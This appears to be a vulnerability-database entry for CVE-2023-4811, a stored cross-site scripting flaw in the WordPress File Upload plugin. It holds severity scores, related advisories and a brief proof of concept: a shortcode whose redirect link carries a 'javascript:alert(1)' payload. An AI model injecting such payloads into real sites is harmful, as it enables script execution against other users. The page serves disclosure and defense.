Lucene search
Faiyaz Ahmad1337DAY-ID-39465HistoryMar 18, 2024 - 12:00 a.m.
WordPress File Upload Plugin < 4.23.3 - Stored XSS Vulnerability
2024-03-1800:00:00
Faiyaz Ahmad
0day.today
66
wordpress
file upload
stored xss
vulnerability
cve 2023-4811
shortcode
exploit
proof of concept
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
7.1 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
14.1%
Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE 2023-4811)
Exploit Author: Faiyaz Ahmad
Vendor Homepage: https://wordpress.com/
Version: 4.23.3
CVE : CVE 2023-4811
Proof Of Concept:
1. Login to the wordpress account
2. Add the following shortcode to a post in "File Upload Plugin":
[wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"]
3. Upload any file on the resulting post.
4. After the upload completes, you will see the XSS alert in the browser.
Related
nvd
nvd
CVE-2023-4811
2023-10-16 20:15:16
wpvulndb
wpvulndb
WordPress File Upload < 4.23.3 - Author+ Stored Cross-Site Scripting
2023-09-25 00:00:00
wpexploit
wpexploit
WordPress File Upload < 4.23.3 - Author+ Stored Cross-Site Scripting
2023-09-25 00:00:00
prion
prion
Cross site scripting
2023-10-16 20:15:00
cve
cve
CVE-2023-4811
2023-10-16 20:15:16
cvelist
cvelist
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
7.1 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
14.1%
Related for 1337DAY-ID-39465